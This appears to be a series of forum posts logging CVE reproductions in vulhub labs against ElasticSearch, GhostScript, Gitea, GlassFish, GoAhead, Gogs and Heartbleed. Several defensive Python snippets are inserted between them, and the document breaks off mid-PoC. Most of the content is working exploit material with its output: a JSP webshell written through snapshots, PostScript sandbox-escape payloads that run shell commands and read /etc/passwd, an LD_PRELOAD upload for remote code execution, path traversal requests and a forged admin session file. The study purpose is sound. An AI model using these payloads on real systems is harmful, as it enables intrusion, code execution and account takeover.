So if other services such as Tomcat or PHP are running on the same file system, we can use ElasticSearch's backup feature to write a webshell.

Like CVE-2015-5531, this vulnerability involves the backup repository. From elasticsearch 1.5.1 on, the root path of backup repositories is restricted to the configuration item path.repo, and if the administrator does not configure that option the feature cannot be used at all by default. Even if the administrator has configured it, a webshell cannot be written when the web path is not under that directory. So the affected ElasticSearch versions are those before 1.5.x.

## Reproduction steps

This test environment runs both Tomcat and ElasticSearch. Tomcat is at /usr/local/tomcat with web directory /usr/local/tomcat/webapps; ElasticSearch is at /usr/share/elasticsearch.

Our goal is to use ElasticSearch to write our webshell into /usr/local/tomcat/webapps.

### First, create a malicious index document

```bash
curl -XPOST http://127.0.0.1:9200/yz.jsp/yz.jsp/1 -d'
{"<%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%>":"test"}
'
```

You get the following:

```json
{"_index":"yz.jsp","_type":"yz.jsp","_id":"1","_version":1,"created":true}
```

### Then create a malicious repository

The value of `location` is the path I want to write to.

> This Repositories path is quite interesting, because it can be written to any reachable location, and if the path does not exist it is created automatically. That means you can create arbitrary directories through the file access protocol. Here I pointed the path at Tomcat's web deployment directory, because as soon as a directory is created in that folder Tomcat automatically creates a new application (if the directory is named wwwroot, the application created is called wwwroot).

```bash
curl -XPUT 'http://127.0.0.1:9200/_snapshot/yz.jsp' -d '{
     "type": "fs",
     "settings": {
          "location": "/usr/local/tomcat/webapps/wwwroot/",
          "compress": false
     }
}'
```

You get the following:

```json
{"acknowledged":true}
```

### Verify the repository and create the snapshot

```bash
curl -XPUT "http://127.0.0.1:9200/_snapshot/yz.jsp/yz.jsp" -d '{
     "indices": "yz.jsp",
     "ignore_unavailable": "true",
     "include_global_state": false
}'
```

You get the following:

```json
{"accepted":true}
```

Visit the address:

http://127.0.0.1:8080/wwwroot/indices/yz.jsp/snapshot-yz.jsp; this is the webshell we wrote.

> This shell writes an arbitrary string into the file test.jsp under wwwroot.

Visiting it gives the following:

```html
<!doctype html><html lang="en"><head><title>HTTP Status 500 – Internal Server Error</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500 – Internal Server Error</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> An exception occurred processing JSP page [&#47;indices&#47;yz.jsp&#47;snapshot-yz.jsp] at line [1]</p><p><b>Description</b> The server encountered an unexpected condition that prevented it from fulfilling the request.</p><p><b>Exception</b></p><pre>org.apache.jasper.JasperException: An exception occurred processing JSP page [&#47;indices&#47;yz.jsp&#47;snapshot-yz.jsp] at line [1]

1: {&quot;yz.jsp&quot;:{&quot;version&quot;:2,&quot;state&quot;:&quot;open&quot;,&quot;settings&quot;:{&quot;index.number_of_shards&quot;:&quot;5&quot;,&quot;index.number_of_replicas&quot;:&quot;1&quot;,&quot;index.version.created&quot;:&quot;1050199&quot;,&quot;index.creation_date&quot;:&quot;1636115699186&quot;,&quot;index.uuid&quot;:&quot;oaxUg-8OT2-GCq0rUJ1eQg&quot;},&quot;mappings&quot;:[{&quot;yz.jsp&quot;:{&quot;properties&quot;:{&quot;&lt;%new java.io.RandomAccessFile(application.getRealPath(new String(new byte[]{47,116,101,115,116,46,106,115,112})),new String(new byte[]{114,119})).write(request.getParameter(new String(new byte[]{102})).getBytes());%&gt;&quot;:{&quot;type&quot;:&quot;string&quot;}}}}],&quot;aliases&quot;:{}}}


Stacktrace:
        org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:598)
        org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:495)
        org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:386)
        org.apache.jasper.servlet.JspServlet.service(JspServlet.java:330)
        javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
        org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
</pre><p><b>Root Cause</b></p><pre>java.lang.NullPointerException
        org.apache.jsp.indices.yz_jsp.snapshot_002dyz_jsp._jspService(snapshot_002dyz_jsp.java:110)
        org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
        javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
        org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:457)
        org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:386)
        org.apache.jasper.servlet.JspServlet.service(JspServlet.java:330)
        javax.servlet.http.HttpServlet.service(HttpServlet.java:742)
        org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
</pre><p><b>Note</b> The full stack trace of the root cause is available in the server logs.</p><hr class="line" /><h3>Apache Tomcat/8.5.33</h3></body></html>
```

Then visit the address:

```
http://127.0.0.1:8080/wwwroot/in ... ot-yz.jsp?f=success
```

You get the following:

```json
{"yz.jsp":{"version":2,"state":"open","settings":{"index.number_of_shards":"5","index.number_of_replicas":"1","index.version.created":"1050199","index.creation_date":"1636115699186","index.uuid":"oaxUg-8OT2-GCq0rUJ1eQg"},"mappings":[{"yz.jsp":{"properties":{"":{"type":"string"}}}}],"aliases":{}}}
```

Finally visit the address:

```
http://127.0.0.1:8080/wwwroot/test.jsp
```

and you get the string we wrote above:

```
success
```

(That's two for today; I'll continue tomorrow....)
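A containment check of the kind the path.repo restriction described above performs, as an added example that is not part of the original post and not Elasticsearch's own code: a requested repository location is decoded, normalised and accepted only if it stays under a configured root, so both the `backdata%2f..%2f..%2fetc%2fpasswd` snapshot name from the CVE-2015-5531 section and the Tomcat webapps location from the WooYun section are rejected. The root list, the function names and the sample inputs are assumptions.

```python
"""Added example: containment check for user-supplied backup paths.

Not Elasticsearch's code; it mirrors the intent of the path.repo restriction
described above. The roots, function names and samples are assumptions.
"""
import posixpath
from urllib.parse import unquote

# Assumed configuration: the only roots a snapshot repository may live under.
PATH_REPO = ["/usr/share/elasticsearch/repo"]


def resolve_within(requested: str, roots=PATH_REPO):
    """Return the normalised absolute path if `requested` stays inside one of
    `roots`, otherwise None.

    - Percent-encoding is removed first: a check that runs before decoding is
      bypassed by encoding the dots or slashes (%2e, %2f).
    - A relative location is joined onto the first root, as a repository
      location would be.
    - posixpath.normpath collapses "." and ".." without touching the file
      system and drops ".." segments that would climb above "/".
    - The candidate must equal a root or lie strictly beneath it; a plain
      prefix test would wrongly accept "/usr/share/elasticsearch/repository".
    """
    decoded = unquote(requested)
    if "\x00" in decoded:            # NUL truncates paths in C-level file APIs
        return None
    if not decoded.startswith("/"):
        decoded = posixpath.join(roots[0], decoded)
    candidate = posixpath.normpath(decoded)
    for root in roots:
        root = posixpath.normpath(root)
        if candidate == root or candidate.startswith(root.rstrip("/") + "/"):
            return candidate
    return None


def check_requests(requests, roots=PATH_REPO):
    """Classify (label, path) pairs; returns {label: accepted_path_or_None}."""
    return {label: resolve_within(path, roots) for label, path in requests}


if __name__ == "__main__":
    # Constructed inputs taken from the write-ups above.
    sample = [
        ("repo location", "/usr/share/elasticsearch/repo/test"),
        ("snapshot dir", "test/snapshot-backdata"),
        ("traversal name", "backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"),
        ("tomcat webapps", "/usr/local/tomcat/webapps/wwwroot/"),
        ("prefix sibling", "/usr/share/elasticsearch/repository/x"),
    ]
    for label, result in check_requests(sample).items():
        print(f"{label:15} -> {'ACCEPT ' + result if result else 'REJECT'}")
```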
Thread starter | Posted 2021-11-6 22:14:52
# GhostScript sandbox bypass (command execution) vulnerability (CVE-2018-16509)

When opened it looks like this:

```html
<form method="post" enctype="multipart/form-data">
    File: <input type="file" name="file_upload">
    <input type="submit">
</form>
```

I downloaded the PoC for this version from GitHub:

```postscript
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops
```

Change it to png format (I renamed it poc.png).

Upload this png file to the lab:

After the upload, the page returns the following:

```
Image size is: uid=0(root) gid=0(root) groups=0(root)
```

At this point the command `id > /tmp/success && cat /tmp/success` has already been executed.

Enter the docker container with the following command:

```bash
docker-compose exec web bash
```

You can see the success file has been created:

```
docker-compose exec web bash
root@215ecac362db:/# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@215ecac362db:/# ls tmp
success
```

Then try the command:

```bash
docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8 convert /poc.png /poc.gif
```

to test the vulnerability (query the id) (it seems this needs another image to be created):

```
docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8 convert /poc.png /poc.gif                                                                                                1 ⨯
uid=0(root) gid=0(root) groups=0(root)
convert: FailedToExecuteCommand `'gs' -sstdout=%stderr -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 '-sDEVICE=pngalpha' -dTextAlphaBits=4 -dGraphicsAlphaBits=4 '-r72x72' -g612x792  '-sOutputFile=/tmp/magick-1ohC3HenitIoz%d' '-f/tmp/magick-1swzXJvBNvLrn' '-f/tmp/magick-1_cI95mT4i2ub' -c showpage' (-1) @ error/delegate.c/ExternalDelegateCommand/462.
convert: no images defined `/poc.gif' @ error/convert.c/ConvertImageCommand/3288.
```

This shows the id command was run successfully.

# GhostScript sandbox bypass (command execution) vulnerability (CVE-2018-19475)

When opened it looks like this:

```html
<form method="post" enctype="multipart/form-data">
    File: <input type="file" name="file_upload">
    <input type="submit">
</form>
```

The PoC this one needs is the same as for the previous level (CVE-2018-16509):

```postscript
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops
```

So again rename this file to .png and upload it.

You get the following:

```
Image size is:
```

Capture the request with Burp Suite and modify the packet to the following:

```http
POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279

------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--


```

Since the information in the response in Burp Suite's Repeater module matches what the page returns, we can tell that in a real environment the result of exploitation usually cannot be echoed back directly, so we would need an out-of-band approach to detect the vulnerability.

# GhostScript sandbox bypass (command execution) vulnerability (CVE-2019-6116)

When opened it looks like this (I have already selected the file I need to upload; screenshot omitted):

This time the PoC needed is different from the previous ones:

```postscript
%!PS
% extract .actual_pdfpaintproc operator from pdfdict
/.actual_pdfpaintproc pdfdict /.actual_pdfpaintproc get def

/exploit {
    (Stage 11: Exploitation...)=

    /forceput exch def

    systemdict /SAFER false forceput
    userparams /LockFilePermissions false forceput
    systemdict /userparams get /PermitFileControl [(*)] forceput
    systemdict /userparams get /PermitFileWriting [(*)] forceput
    systemdict /userparams get /PermitFileReading [(*)] forceput

    % update
    save restore

    % All done.
    stop
} def

errordict /typecheck {
    /typecount typecount 1 add def
    (Stage 10: /typecheck #)=only typecount ==

    % The first error will be the .knownget, which we handle and setup the
    % stack. The second error will be the ifelse (missing boolean), and then we
    % dump the operands.
    typecount 1 eq { null } if
    typecount 2 eq { pop 7 get exploit } if
    typecount 3 eq { (unexpected)= quit }  if
} put

% The pseudo-operator .actual_pdfpaintproc from pdf_draw.ps pushes some
% executable arrays onto the operand stack that contain .forceput, but are not
% marked as executeonly or pseudo-operators.
%
% The routine was attempting to pass them to ifelse, but we can cause that to
% fail because when the routine was declared, it used `bind` but many of the
% names it uses are not operators and so are just looked up in the dictstack.
%
% This means we can push a dict onto the dictstack and control how the routine
% works.
<<
    /typecount      0
    /PDFfile        { (Stage 0: PDFfile)= currentfile }
    /q              { (Stage 1: q)= } % no-op
    /oget           { (Stage 3: oget)= pop pop 0 } % clear stack
    /pdfemptycount  { (Stage 4: pdfemptycount)= } % no-op
    /gput           { (Stage 5: gput)= }  % no-op
    /resolvestream  { (Stage 6: resolvestream)= } % no-op
    /pdfopdict      { (Stage 7: pdfopdict)= } % no-op
    /.pdfruncontext { (Stage 8: .pdfruncontext)= 0 1 mark } % satisfy counttomark and index
    /pdfdict        { (Stage 9: pdfdict)=
        % cause a /typecheck error we handle above
        true
    }
>> begin <<>> <<>> { .actual_pdfpaintproc } stopped pop

(Should now have complete control over ghostscript, attempting to read /etc/passwd...)=

% Demonstrate reading a file we shouldnt have access to.
(/etc/passwd) (r) file dup 64 string readline pop == closefile

(Attempting to execute a shell command...)= flush

% run command
(%pipe%id > /tmp/success) (w) file closefile

(All done.)=

quit
```

After clicking upload you get the following page:

```
Image size is:
```

Enter the docker container from the command line:

You can see the file inside it:

```
root@0df078d3e477:/# ls
bin  boot  dev  etc  home  lib  lib64  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var
root@0df078d3e477:/# cd tmp
root@0df078d3e477:/tmp# ls
success
```

We can also use

```bash
docker run -it --rm --name uu -v `pwd`/poc.png:/tmp/poc.png vulhub/imagemagick:7.0.8-27-php identify /tmp/poc.png
```

but I didn't get this one to work....

# Gitea 1.4.0 directory traversal leading to command execution

When opened it looks like this (screenshot omitted):

After installation, create a repository:

Capture the request with Burp Suite and modify the packet to the following:

```http
POST /sandalwood/asd.git/info/lfs/objects HTTP/1.1
Host: localhost:3000
Accept-Encoding: gzip, deflate
Accept: application/vnd.git-lfs+json
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 157

{
    "Oid": "....../../../etc/passwd",
    "Size": 1000000,
    "User" : "a",
    "Password" : "a",
    "Repo" : "a",
    "Authorization" : "a"
}
```

In the Repeater module you get the following:

```http
HTTP/1.1 401 Unauthorized
Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
Set-Cookie: i_like_gitea=089b8f9e20e64e81; Path=/; HttpOnly
Set-Cookie: _csrf=HtSBgI6SGslRjBq_vM57BOGuyLA6MTYzNjE3NzA0ODA0MjUwMDQ3Mw%3D%3D; Path=/; Expires=Sun, 07 Nov 2021 05:37:28 GMT; HttpOnly
Www-Authenticate: Basic realm=gitea-lfs
X-Frame-Options: SAMEORIGIN
Date: Sat, 06 Nov 2021 05:37:28 GMT
Content-Length: 499
Content-Type: text/plain; charset=utf-8
Connection: close

{"message":"Unauthorized"}{"oid":"....../../../etc/passwd","size":1000000,"actions":{"upload":{"href":"http://localhost:3000/sandalwood/asd.git/info/lfs/etc/passwd","header":{"Accept":"application/vnd.git-lfs","Authorization":"Authorization: Basic dummy"},"expires_at":"0001-01-01T00:00:00Z"},"verify":{"href":"http://localhost:3000/sandalwood/asd.git/info/lfs/verify","header":{"Accept":"application/vnd.git-lfs","Authorization":"Authorization: Basic dummy"},"expires_at":"0001-01-01T00:00:00Z"}}}
```

Then visit:

```
http://localhost:3000/sandalwood/asd.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth
```

and you get the following:

```http
HTTP/1.1 200 OK
Content-Type: application/vnd.git-lfs+json
Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
Set-Cookie: i_like_gitea=f0221584854edb12; Path=/; HttpOnly
Set-Cookie: _csrf=hwwhXxKqxKigjnutVXMF9UzokOU6MTYzNjE3NzMxNDM3MzMwMzMwNQ%3D%3D; Path=/; Expires=Sun, 07 Nov 2021 05:41:54 GMT; HttpOnly
X-Frame-Options: SAMEORIGIN
Date: Sat, 06 Nov 2021 05:41:54 GMT
Content-Length: 271
Connection: close

{"oid":"....../../../etc/passwd","size":1000000,"actions":{"download":{"href":"http://localhost:3000/sandalwood/asd.git/info/lfs/etc/passwd","header":{"Accept":"application/vnd.git-lfs","Authorization":"Authorization: Basic dummy"},"expires_at":"0001-01-01T00:00:00Z"}}}
```

# GlassFish arbitrary file read vulnerability

When opened it looks like this:

```html
<div style="height: 435px;background-image: url(/resource/community-theme/images/login-backimage-open.png);
    background-repeat:no-repeat;background-position:left top; width: 720px; margin: auto;">
    <div style="width: 460px; padding-top: 160px; margin-left: 310px;">
<img id="sun_image11" src="/resource/community-theme/images/login-product_name_open.png" alt="GlassFish Server Open Source Edition" height="42" width="329" border="0" />
        <form method="POST" class="form" name="loginform" action="j_security_check">
        <table role="presentation">
        <tr>
            <td><label for="Login.username" style="font-weight: bold;">User Name:</label></td>
            <td><input type="text" name="j_username" id="Login.username" tabindex="1" value=""></td>
        </tr>
        <tr>
            <td><label for="Login.password" style="font-weight: bold;">Password:</label>
            <td><input type="password" name="j_password" id="Login.password" tabindex="2">
        <tr>
            <td colspan="2" align="center">
                <input type="submit" class="Btn1"
                    value="Login"
                    title="Log In to GlassFish Administration Console" tabindex="3"
                    onmouseover="javascript: if (this.disabled==0) this.className='Btn1Hov'"
                    onmouseout="javascript: if (this.disabled==0) this.className='Btn1'"
                    onblur="javascript: if (this.disabled==0) this.className='Btn1'"
                    onfocus="javascript: if (this.disabled==0) this.className='Btn1Hov'"
                    name="loginButton" id="loginButton">
                    <input type="hidden" name="loginButton.DisabledHiddenField" value="true" />
                </td>
            </tr>
            </table>
        </form>
    </div>
</div>
```

This is the GlassFish administration console.

Visit

```
https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
```

and you find that /etc/passwd has been read successfully:

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
messagebus:x:101:102::/var/run/dbus:/bin/false
```

---

PS:

The super administrator password for this environment is set in `docker-compose.yml` and defaults to `vulhub_default_password`; with it you can log in to the administrator account on port 4848.

# GoAhead remote command execution vulnerability (CVE-2017-17562)

When opened it looks like this:

```
Congratulations! The server is up and running.
```

First save the following code as a C source file,

named CVE-2017-17562.c:

```c
#include <unistd.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello: World!\n", 14);
}
```

Use the command:

```bash
gcc -shared -fPIC ./CVE-2017-17562.c -o payload.so
```

Then use the command:

```bash
curl -X POST --data-binary @payload.so "http://127.0.0.1:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i
```

to execute the code.

In the result we find the output of the C program above: it printed hello world.

```
curl -X POST --data-binary @payload.so "http://127.0.0.1:8080/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i                                                                                                     
HTTP/1.1 200 OK
Date: Sat Nov  6 11:18:15 2021
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: no-cache
hello:  World!
Content-Type: text/html

<title>cgi title</title><h1>hello world!</h1>      
```

# Gogs arbitrary user login vulnerability (CVE-2018-18925)

When opened it looks like this (an installation page; screenshot omitted):

After installation the docker service needs to be restarted:

```bash
docker-compose restart
```

otherwise the session is stored in memory.

Generate a session file with gob:

```go
package main

import (
    "bytes"
    "encoding/gob"
    "encoding/hex"
    "fmt"
    "io/ioutil"
    "os"
)

// EncodeGob serialises the session map the same way the file session store
// does, registering each concrete value type so interface{} values decode.
func EncodeGob(obj map[interface{}]interface{}) ([]byte, error) {
    for _, v := range obj {
        gob.Register(v)
    }
    buf := bytes.NewBuffer(nil)
    err := gob.NewEncoder(buf).Encode(obj)
    return buf.Bytes(), err
}

func main() {
    var uid int64 = 1
    obj := map[interface{}]interface{}{"_old_uid": "1", "uid": uid, "uname": "root"}
    data, err := EncodeGob(obj)
    if err != nil {
        fmt.Println(err)
        os.Exit(1)
    }
    // The third argument is a file mode, not open flags; 0644 keeps the
    // generated file readable so it can be uploaded afterwards.
    err = ioutil.WriteFile("data", data, 0644)
    if err != nil {
        fmt.Println(err)
        os.Exit(1)
    }
    edata := hex.EncodeToString(data)
    fmt.Println(edata)
}
```

Register an ordinary user account, create a repository, and upload the session file just generated on the "Releases" page:


From the attachment's URL we learn the file name: ./attachments/2eb7f1a2-b5ec-482e-a297-15b625d24a10.

Then construct the Cookie: i_like_gogits=../attachments/2/e/2eb7f1a2-b5ec-482e-a297-15b625d24a10; visiting the site shows that we are logged in as the user with id=1 (the administrator):

After logging in, capture the request with Burp Suite and replace the session in the packet with the session generated from the file above:


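Why the curl command above works, as an added example in Python (mine, not GoAhead's code): GoAhead's CGI handler exports every query-string parameter as an environment variable for the CGI child and hands it the POST body on stdin, so LD_PRELOAD=/proc/self/fd/0 makes the dynamic loader map the POSTed shared object before the CGI's main() runs. build_cgi_env models that behaviour, build_cgi_env_filtered applies a check of the kind the fix introduced (drop loader-controlled LD_* names before building the environment), and exploit_request produces the raw HTTP request equivalent to the curl invocation. FAKE_SO is a constructed stand-in for payload.so, and the extra names in BLOCKED_NAMES are my own assumption about what a careful handler also refuses.

```python
import re
from urllib.parse import parse_qsl

# Names the hardened handler refuses to copy into the CGI environment.
# LD_* covers the loader-controlled variables the GoAhead fix rejects;
# the extra names are an assumption about what a careful handler also drops.
BLOCKED_PREFIXES = ("LD_",)
BLOCKED_NAMES = {"PATH", "IFS"}
ENV_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def build_cgi_env(query: str) -> dict:
    """Vulnerable model: every query parameter becomes an environment variable
    of the CGI child, so LD_PRELOAD reaches the dynamic loader untouched."""
    env = {"QUERY_STRING": query, "REQUEST_METHOD": "POST"}
    for name, value in parse_qsl(query, keep_blank_values=True):
        env[name] = value
    return env


def build_cgi_env_filtered(query: str) -> dict:
    """Hardened model: only well-formed names that are not loader-controlled
    are exported; the script can still read the rest from QUERY_STRING."""
    env = {"QUERY_STRING": query, "REQUEST_METHOD": "POST"}
    for name, value in parse_qsl(query, keep_blank_values=True):
        upper = name.upper()
        if upper.startswith(BLOCKED_PREFIXES) or upper in BLOCKED_NAMES:
            continue
        if not ENV_NAME.fullmatch(name):
            continue
        env[name] = value
    return env


def loader_would_preload(env: dict) -> bool:
    """True if the environment handed to the child still carries LD_PRELOAD."""
    return any(k.upper() == "LD_PRELOAD" for k in env)


def exploit_request(host: str, port: int, path: str, payload: bytes) -> bytes:
    """Raw HTTP request equivalent to the curl command above: the body is the
    shared object, the CGI receives that body on stdin, and /proc/self/fd/0
    names it for the loader."""
    target = f"{path}?LD_PRELOAD=/proc/self/fd/0"
    head = (
        f"POST {target} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        f"Content-Type: application/octet-stream\r\n"
        f"Content-Length: {len(payload)}\r\n"
        f"Connection: close\r\n\r\n"
    )
    return head.encode() + payload


# Constructed stand-in for payload.so (a real ELF file starts with these 4 bytes).
FAKE_SO = b"\x7fELF" + b"\x00" * 60

if __name__ == "__main__":
    q = "LD_PRELOAD=/proc/self/fd/0"
    print(loader_would_preload(build_cgi_env(q)))           # True: vulnerable
    print(loader_would_preload(build_cgi_env_filtered(q)))  # False: filtered
    print(exploit_request("127.0.0.1", 8080, "/cgi-bin/index", FAKE_SO)[:60])
```

The filter compares names case-insensitively because the loader only honours the exact LD_PRELOAD spelling, but rejecting any ld_* spelling costs nothing and closes off case tricks in other parts of the pipeline.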

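What the i_like_gogits cookie above actually does, as an added example (mine, not Gogs code): the file session provider turns the session id from the cookie into a file path of the form root/sid[0]/sid[1]/sid and never checks that the result stays under root, so an id beginning with ../attachments/ makes the server read the uploaded gob file as a session. Assumptions labelled in the code: sessions live under data/sessions and attachments under data/attachments (the default layout, which is why the two-level ../attachments/2/e/ path lines up with the upload), and legitimate session ids are plain alphanumerics. session_file_path is the vulnerable construction, session_file_path_checked adds the checks a fix needs.

```python
import os
import re

# Assumption: default Gogs data layout, sessions and attachments are siblings
# under data/, so "../attachments/..." from the session root reaches uploads.
SESSION_ROOT = "data/sessions"
ATTACHMENT_ROOT = "data/attachments"

# Assumption: genuine session ids are alphanumeric; anything else is rejected.
VALID_SID = re.compile(r"[A-Za-z0-9]{16,}")


def session_file_path(root: str, sid: str) -> str:
    """Vulnerable construction: root/<sid[0]>/<sid[1]>/<sid>, with no check that
    the resolved path is still inside root. A sid beginning with '..' escapes."""
    return os.path.normpath(os.path.join(root, sid[0], sid[1], sid))


def attachment_path(root: str, uuid: str) -> str:
    """Where an uploaded attachment is stored: root/<uuid[0]>/<uuid[1]>/<uuid>."""
    return os.path.normpath(os.path.join(root, uuid[0], uuid[1], uuid))


def traversal_sid_for_attachment(uuid: str) -> str:
    """Cookie value that makes the session loader open the attachment instead."""
    return f"../attachments/{uuid[0]}/{uuid[1]}/{uuid}"


def session_file_path_checked(root: str, sid: str) -> str:
    """Hardened version: reject ids that are not plain alphanumerics, then verify
    the resolved path still sits under the session root."""
    if not VALID_SID.fullmatch(sid):
        raise ValueError("invalid session id")
    path = session_file_path(root, sid)
    root_abs = os.path.abspath(root)
    if os.path.commonpath([root_abs, os.path.abspath(path)]) != root_abs:
        raise ValueError("session path escapes session root")
    return path


if __name__ == "__main__":
    uuid = "2eb7f1a2-b5ec-482e-a297-15b625d24a10"  # the attachment name from above
    sid = traversal_sid_for_attachment(uuid)
    print(sid)
    print(session_file_path(SESSION_ROOT, sid))   # resolves to the uploaded attachment
    print(attachment_path(ATTACHMENT_ROOT, uuid))  # the same file
```

The point of the commonpath check is that it guards the resolved path rather than the input string, so it also catches an encoded or otherwise unexpected separator that the alphanumeric test alone might not anticipate.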
Original poster | Posted on 2021-11-7 22:05:51
Today I reproduced a few CVEs, then did a few LeetCode problems (to knock my C skills down a peg).

# Heartbleed vulnerability (CVE-2014-0160)

After opening it, the page looks like this (so bare):

```
Heartbleed Test
```


I found a PoC for this vulnerability on GitHub.

Note: this PoC needs to be run with Python 3 (although the file says to run it with Python 2, running it with Python 2 always throws an error).

```python
#!/usr/bin/env python3

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import binascii
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))

hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                 
''')

# Heartbeat record: content type 0x18 (24), TLS 1.1, record length 3;
# payload = heartbeat request (01) claiming a 0x4000-byte payload with none attached.
hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s: bytes):
    for b in range(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % c for c in lin)
